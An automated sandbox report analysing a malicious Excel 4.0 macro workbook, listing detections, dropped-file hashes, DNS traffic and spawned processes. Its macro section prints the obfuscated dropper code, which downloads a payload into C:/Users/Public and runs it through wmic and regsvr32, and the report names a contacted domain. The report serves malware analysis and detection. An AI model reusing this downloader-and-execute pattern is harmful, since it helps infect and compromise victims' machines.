Analysis Report Documents (252).xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Wmic Launch regsvr32 | Show sources |
Source: | Author: Joe Security: |
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Potential document exploit detected (performs DNS queries with low reputation score) | Show sources |
Source: | DNS query: |
Source: | DNS query: |
Networking: |
---|
Office document connecting to suspicious TLD | Show sources |
Source: | DNS traffic detected: |
Outdated Microsoft Office dropper detected | Show sources |
Source: | DNS query: |
Performs DNS queries to domains with low reputation | Show sources |
Source: | DNS query: |
Source: | DNS traffic detected: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Contains functionality to create processes via WMI | Show sources |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Persistence and Installation Behavior: |
---|
Creates processes via WMI | Show sources |
Source: | WMI Queries: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting21 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution31 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | System Information Discovery4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
xherzog24pv.xyz | unknown | unknown | true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low |
Contacted IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382991 |
Start date: | 07.04.2021 |
Start time: | 02:09:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 37s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents (252).xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLSM@4/12@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:09:38 | API Interceptor |
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 279279 |
Entropy (8bit): | 7.646925449721352 |
Encrypted: | false |
SSDEEP: | 6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ |
MD5: | BD358272AF7DAB33151195FF12D6217E |
SHA1: | CCC193B27AA91319B42770E4B668FAF7A7929DB6 |
SHA-256: | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012 |
SHA-512: | 0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.478553609647248 |
Encrypted: | false |
SSDEEP: | 12:85QQncLgXg/XAlCPCHaXgzB8IB/4UKX+WnicvbPbDtZ3YilMMEpxRljKzTdJP9TK:85dnK/XTwz6IMYe/Dv3q6rNru/ |
MD5: | 835340709C9BFF9A87235BAEB59683B1 |
SHA1: | 0754C627E8564659FE9FB5373FDC2F130EE5CB5E |
SHA-256: | 0368C23B6D83D9BCEC16378A4E104A8CC2AFD0DA0CF5CFC78751943FC89C133D |
SHA-512: | CF31D804EA36B6AC64631F6C19BE45E8C03C684D3669BD76CAEE55CA489C8B77EC5B74ACD688C4868521097DD61BA8F177B7C9E8F770DE4854E63CA8161751A1 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4176 |
Entropy (8bit): | 4.564390408570414 |
Encrypted: | false |
SSDEEP: | 96:8i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Qh2i/XLInkAm6Q/:8wInkArQEwInkArQEwInkArQEwInkArg |
MD5: | B2ACE93FE976A321BFC3FD8E59A2B6A6 |
SHA1: | 93F2EB6AC0E1675C80834266AEB0FE694415CB66 |
SHA-256: | 22FEDE4E594CE2465437BAA9E7604556671CE3F8C4AC95C1B9272072A9543952 |
SHA-512: | 942CC4B55B31C338514ACBBD19F1103C8DA9333B2BB33155C4BA1BF179A4B271BB3DDCD8EB062B9F203806C3210943385FD854847FED39EEA71BDDA2A8A81155 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 208 |
Entropy (8bit): | 4.621699231260284 |
Encrypted: | false |
SSDEEP: | 6:dj/HXPiSGXPPHXPiSGXPPHXPiSGXPPHXPC:dTHFG3HFG3HFG3HK |
MD5: | EBF0A100F3CDA68735AABF46F42CEFEF |
SHA1: | 48CA8B0E2DD6FE5737EFA9DAA2F9BB055B72F9E0 |
SHA-256: | F86272101EB9CA0D4BB98DE814ADAAB3FF2891930B18A20BDDD8CDE3B55AF55B |
SHA-512: | C5CBA2A91FEBBAB5B2CB86901F9D8BB50DD720175CDFF25104F37D448B0B6CA43CD9D1F4D5068E7AFB4B9AD564A863EE4914E9ECB9EAF29CC2858DF55CC295A2 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 279279 |
Entropy (8bit): | 7.646925449721352 |
Encrypted: | false |
SSDEEP: | 6144:5QUOipLbVxhmafLtkjY9s0npbXPygvjRNpd5uMDyi:5QUOipLbVxhmafLtkjY9s0npbXPyHMJ |
MD5: | BD358272AF7DAB33151195FF12D6217E |
SHA1: | CCC193B27AA91319B42770E4B668FAF7A7929DB6 |
SHA-256: | 08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012 |
SHA-512: | 0B5526CFFD77109335AC74E77475A78B4A8DCF9AC7B35A67F46115F71A81A7A8C1FAC06261C04B97ED6112608F12ADD4F7D39BC5C20B4A5E4324FAF535E1BD8E |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fj/FFDJw2fV:vBFFGaFFGaFFGS |
MD5: | 98D7F9B901C91608CD7EA5509662BBCA |
SHA1: | F166635CE572B615A1D80076A1AE8DE9220473CF |
SHA-256: | F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE |
SHA-512: | 5536FD72C18081A1CFB46EB2E311BB257764C53B293E0D4B90F9C6C5EFB00E5A3A28190A2D04F3EE2819CF8DC7EBA7747DC8E8910C8716ACA7BAED0532142D1C |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.557820060670911 |
TrID: |
|
File name: | Documents (252).xlsm |
File size: | 210308 |
MD5: | 966c13f10fa0b3bfe75da87bca817396 |
SHA1: | 1769db2ec1d019b526e63637a413ceab10d00ff3 |
SHA256: | 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14 |
SHA512: | e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7 |
SSDEEP: | 1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE |
File Content Preview: | PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents (252).xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AC19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AA19(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AC20,AD20,""JCJ"",AE19,0)",,"=FORMULA.ARRAY(before.1.0.0.sheet!AK20&before.1.0.0.sheet!AK21&before.1.0.0.sheet!AK22&before.1.0.0.sheet!AK23&before.1.0.0.sheet!AK24&before.1.0.0.sheet!AK25&before.1.0.0.sheet!AK26&before.1.0.0.sheet!AK27,AC20)","=FORMULA.ARRAY(before.1.0.0.sheet!AL20&before.1.0.0.sheet!AL21&before.1.0.0.sheet!AL22&before.1.0.0.sheet!AL23&before.1.0.0.sheet!AL24&before.1.0.0.sheet!AL25&before.1.0.0.sheet!AL26&before.1.0.0.sheet!AL27&before.1.0.0.sheet!AL28&before.1.0.0.sheet!AL29&before.1.0.0.sheet!AL30&before.1.0.0.sheet!AL31&before.1.0.0.sheet!AL32&before.1.0.0.sheet!AL33&before.1.0.0.sheet!AL34&before.1.0.0.sheet!AL35,AD20)",C:/Users/Public,/dbhfr.xref,"=FORMULA.ARRAY(""A"",before.1.0.0.sheet!AE20)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""UR""&before.1.0.0.sheet!AN21,before.1.0.0.sheet!AO20&before.1.0.0.sheet!AO21&before.1.0.0.sheet!AO22&before.1.0.0.sheet!AO23&before.1.0.0.sheet!AO24&before.1.0.0.sheet!AO25&before.1.0.0.sheet!AO26&before.1.0.0.sheet!AO27&before.1.0.0.sheet!AO28&before.1.0.0.sheet!AO29&before.1.0.0.sheet!AO30&before.1.0.0.sheet!AO31&before.1.0.0.sheet!AO32&before.1.0.0.sheet!AO33&before.1.0.0.sheet!AO34&before.1.0.0.sheet!AO35&before.1.0.0.sheet!AO36&before.1.0.0.sheet!AE20,AI27,0,A99,before.1.0.0.sheet!AE19&before.1.0.0.sheet!AF19,0,0)",,Kernel32,CreateDirectoryA,A,,,,,,K,C,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AF28(),,=AD19(),=AG19(),,,=AA17(),,,,e,r,,LMon,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,e,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,a,,,D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,t,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,,,w,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,D,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJCCBB,,2,i,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""wmic.exe ""&"" process call create 'regsvr32 -s ""&AE19&AF19&""'"")",,,,,,r,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,e,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,c,,,d,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,,,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,y,,,i,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 02:09:48.929415941 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 02:09:48.952637911 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 02:09:48.929415941 CEST | 192.168.2.22 | 8.8.8.8 | 0x26d4 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 02:09:48.952637911 CEST | 8.8.8.8 | 192.168.2.22 | 0x26d4 | Name error (3) | none | none | A (IP address) | IN (0x0001) |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 02:09:33 |
Start date: | 07/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f550000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 02:09:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\wbem\WMIC.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff4f0000 |
File size: | 566272 bytes |
MD5 hash: | FD902835DEAEF4091799287736F3A028 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 02:09:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa70000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|